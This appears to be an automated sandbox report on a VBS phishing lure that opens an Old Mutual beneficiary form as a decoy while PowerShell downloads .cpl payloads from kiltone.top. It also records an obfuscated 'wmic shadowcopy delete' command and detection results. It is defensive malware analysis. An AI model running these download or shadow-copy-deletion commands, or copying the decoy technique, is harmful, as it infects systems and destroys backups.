Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf, CommandLine: powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6844, ParentProcessName: cmd.exe, ProcessCommandLine: powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf, ProcessId: 6896, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6424, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://kiltone.top/stelin/Gosjeufon.cplAvira URL Cloud: Label: malware
Source: https://kiltone.top/stelin/rwcla.cplAvira URL Cloud: Label: malware
Source: kiltone.topVirustotal: Detection: 13%Perma Link
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\fjeljies.cplReversingLabs: Detection: 34%
Source: NOTIFICATION_OF_DEPENDANTS.vbsVirustotal: Detection: 10%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeJoe Sandbox ML: detected
Source: https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfHTTP Parser: No favicon
Source: file:///C:/Users/user/Downloads/downloaded.pdfHTTP Parser: No favicon
Source: file:///C:/Users/user/Downloads/downloaded.pdfHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 173.222.162.60:443 -> 192.168.2.12:49730 version: TLS 1.0
Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.12:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.12:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.125.67.168:443 -> 192.168.2.12:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.125.67.168:443 -> 192.168.2.12:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.12:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.12:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.12:49751 version: TLS 1.2
Source: Binary string: Z:\scvhost\Release\scvhost.pdb source: eryy65ty.exe, 00000021.00000000.2912147035.0000000000AEB000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 00000029.00000000.3080470002.0000000000AEB000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 0000002C.00000000.3165550384.0000000000AEB000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe.30.dr
Source: Binary string: Z:\lderd\Release\lderd.pdb source: fjeljies.cpl.16.dr
Source: Binary string: Z:\scvhost\Release\scvhost.pdbd source: eryy65ty.exe, 00000021.00000000.2912147035.0000000000AEB000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 00000029.00000000.3080470002.0000000000AEB000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 0000002C.00000000.3165550384.0000000000AEB000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe.30.dr
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\migration\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\migration\wtr\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\hwvid-migration-2\

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: chrome.exeMemory has grown: Private usage: 1MB later: 38MB

Networking

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewASN Name: TELE-ASTeleAsiaLimitedHK TELE-ASTeleAsiaLimitedHK
Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownHTTPS traffic detected: 173.222.162.60:443 -> 192.168.2.12:49730 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
Source: global trafficHTTP traffic detected: GET /v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf HTTP/1.1Host: www.oldmutual.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.oldmutual.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf HTTP/1.1Host: www.oldmutual.co.zaConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /stelin/rwcla.cpl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kiltone.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /stelin/Gosjeufon.cpl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kiltone.topConnection: Keep-Alive
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: www.oldmutual.co.za
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: kiltone.top
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 8659Connection: closeDate: Mon, 16 Dec 2024 05:40:19 GMTLast-Modified: Fri, 13 Dec 2024 15:13:14 GMTx-amz-server-side-encryption: AES256Accept-Ranges: bytesServer: AmazonS3Content-Security-Policy: default-src 'self'; font-src 'self' data: https://use.typekit.net https://test-dms.oldmutual.com.gh https://test.interpayafrica.com https://test-dms.oldmutual.com.gh/* https://test.interpayafrica.com/* https://tagmanager.google.com https://fonts.googleapis.com https://fonts.gstatic.com https://www.brighttalk.com https://www.pages06.net https://vds.issproxy.com https://vds.issgovernance.com https://ir.tools.investis.com https://otp.tools.investis.com https://irs.tools.investis.com https://services.ominsure.co.za https://embed.tawk.to https://salesiq.zoho.com https://css.zohostatic.com https://css.zohocdn.com/* https://css.zohocdn.com/salesiq/styles/fonts/cw/puvi/* https://css.zohocdn.com/salesiq/styles/fonts/cw/* https://css.zohocdn.com; style-src 'self' 'unsafe-inline' https://tagmanager.google.com https://test-dms.oldmutual.com.gh https://test.interpayafrica.com https://test-dms.oldmutual.com.gh/* https://test.interpayafrica.com/* https://fonts.googleapis.com https://optimize.google.com https://www.brighttalk.com https://www.pages06.net https://vds.issproxy.com https://vds.issgovernance.com https://ir.tools.investis.com https://otp.tools.investis.com https://irs.tools.investis.com https://services.ominsure.co.za https://www.gstatic.com https://embed.tawk.to https://cdn.jsdelivr.net/* https://css.zohocdn.com https://css.zohostatic.com https://cdn.jsdelivr.net/* https://static.zohocdn.com; img-src 'self' data: https://p.typekit.net https://tawk.link https://tawk.link/* https://test-dms.oldmutual.com.gh https://test.interpayafrica.com https://test-dms.oldmutual.com.gh/* https://test.interpayafrica.com/* https://t.co https://www.google.co.za https://www.google.com https://www.gstatic.com https://ssl.gstatic.com https://maps.gstatic.com https://maps.googleapis.com https://eu-images.contentstack.com https://images.contentstack.io https://i.ytimg.com https://www.google-analytics.com https://www.facebook.com https://stats.g.doubleclick.net https://px.ads.linkedin.com https://p.adsymptotic.com https://lh3.googleusercontent.com https://www.brighttalk.com https://www.pages06.net https://vds.issproxy.com https://vds.issgovernance.com https://ir.tools.investis.com https://otp.tools.investis.com https://irs.tools.investis.com https://optimize.google.com https://ws.sessioncam.com https://services.ominsure.co.za https://*.fls.doubleclick.net https://sp.analytics.yahoo.com https://embed.tawk.to https://embed.tawk.to https://salesiq.zoho.com https://salesiq.zoho https://salesiq.zohopublic.com https://css.zohostatic.com https://css.zohostatic.com/* https://css.zohocdn.com https://analytics.twitter.com/1/i/* https://geo-tracker.trinadsp.co.za/* https://s2s.oldmutual.co.za https://track.adform.
Source: cert9.db.33.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: cert9.db.33.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: cert9.db.33.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: svchost.exe, 0000000A.00000002.3827902230.000001FE85C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: cert9.db.33.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: cert9.db.33.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: cert9.db.33.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: cert9.db.33.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: svchost.exe, 0000000A.00000002.3828251316.000001FE85CE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/
Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000000A.00000002.3828251316.000001FE85CCE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.3827124417.000001FE80F02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.3246268463.000001FE85A62000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.3827902230.000001FE85C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.3828163553.000001FE85C64000.00000004.00000020.00020000.00000000.sdmp, edb.log.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/
Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 0000000A.00000002.3828163553.000001FE85C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80
Source: qmgr.db.10.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: cert9.db.33.drString found in binary or memory: http://ocsp.digicert.com0
Source: cert9.db.33.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: cert9.db.33.drString found in binary or memory: http://x1.c.lencr.org/0
Source: cert9.db.33.drString found in binary or memory: http://x1.i.lencr.org/0
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://MD8.mozilla.org/1/m
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://account.bellmedia.c
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://allegro.pl/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://bugzilla.mo
Source: prefs.js.33.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: fjeljies.cpl.16.drString found in binary or memory: https://digify.com/a/#/access/login
Source: fjeljies.cpl.16.drString found in binary or memory: https://digify.com/a/#/access/logincmd
Source: edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 0000000A.00000003.2602260970.000001FE85A60000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: extensions.json.33.drString found in binary or memory: https://github.com/mozilla/webcompat-reporter
Source: prefs.js.33.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbmfQq%2B4pbW4pbWfpbX7ReNxR3UIG8zInwYIFIVs9e
Source: wscript.exe, 00000000.00000002.2771404958.00000190EAB65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kiltone.t
Source: fjeljies.cpl.16.drString found in binary or memory: https://kiltone.top/stelin/Gosjeufon.cpl
Source: cmd.exe, 0000001C.00000002.2909815047.0000000002F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kiltone.top/stelin/Gosjeufon.cpl-Outfile$env:tmp
Source: wscript.exe, wscript.exe, 00000000.00000002.2771404958.00000190EAB65000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2771710158.00000190ECAC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kiltone.top/stelin/rwcla.
Source: wscript.exe, 00000000.00000002.2771404958.00000190EAB65000.00000004.00000020.00020000.00000000.sdmp, NOTIFICATION_OF_DEPENDANTS.vbsString found in binary or memory: https://kiltone.top/stelin/rwcla.cpl
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://login.live.com
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://login.microsoftonline.com
Source: extensions.json.33.drString found in binary or memory: https://screenshots.firefox.com/
Source: places.sqlite.33.drString found in binary or memory: https://support.mozilla.org
Source: places.sqlite.33.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: favicons.sqlite.33.drString found in binary or memory: https://support.mozilla.org/products/firefox
Source: places.sqlite.33.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.P9ZDdyXKOWl2
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://twitter.com/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://weibo.com/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.aliexpress.com/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.amazon.ca/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.amazon.co.uk/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.amazon.com/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.amazon.de/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.amazon.fr/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.avito.ru/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.baidu.com/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.bbc.co.uk/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.ctrip.com/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.ebay.co.uk/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.ebay.de/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.google.com/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.google.com/complete/
Source: 335f85c0-9448-4635-9bf1-f868e331c1e6.33.dr, 820a30c5-7f21-4cfe-9fd2-c7b1392e747b.33.dr, f172e4e6-9a48-464e-8f64-96feb97a835e.33.drString found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: data.safe.bin.33.drString found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=&
Source: data.safe.bin.33.drString found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=&metrics#search.engine.default.verified
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.ifeng.com/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.iqiyi.com/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.leboncoin.fr/
Source: places.sqlite.33.dr, 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.mozilla.org
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.mozilla.org/
Source: favicons.sqlite.33.drString found in binary or memory: https://www.mozilla.org/about/
Source: places.sqlite.33.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.5iSPD7jwkDnW
Source: favicons.sqlite.33.drString found in binary or memory: https://www.mozilla.org/contribute/
Source: places.sqlite.33.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.3UfcDFx2ZSAZ
Source: places.sqlite.33.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: places.sqlite.33.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.msn.com
Source: chromecache_545.11.drString found in binary or memory: https://www.oldmutual.co.za/news/internet-explorer-support
Source: wscript.exe, wscript.exe, 00000000.00000002.2771404958.00000190EAB65000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2771710158.00000190ECAC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.oldmutual.co.za/v3/assets/blt0
Source: wscript.exe, 00000000.00000002.2771404958.00000190EAB65000.00000004.00000020.00020000.00000000.sdmp, NOTIFICATION_OF_DEPENDANTS.vbsString found in binary or memory: https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b443
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.olx.pl/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.reddit.com/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.wykop.pl/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.youtube.com/
Source: 3870112724rsegmnoittet-es.sqlite.33.drString found in binary or memory: https://www.zhihu.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.12:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.12:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.125.67.168:443 -> 192.168.2.12:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.125.67.168:443 -> 192.168.2.12:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.12:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.12:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.12:49751 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\IgQfcH\IgQf\..\..\Windows\IgQf\IgQf\..\..\system32\IgQf\IgQf\..\..\wbem\IgQf\IgQfc\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\HdMVWr\HdMV\..\..\Windows\HdMV\HdMV\..\..\system32\HdMV\HdMV\..\..\wbem\HdMV\HdMVW\..\..\wmic.exe shadowcopy delete
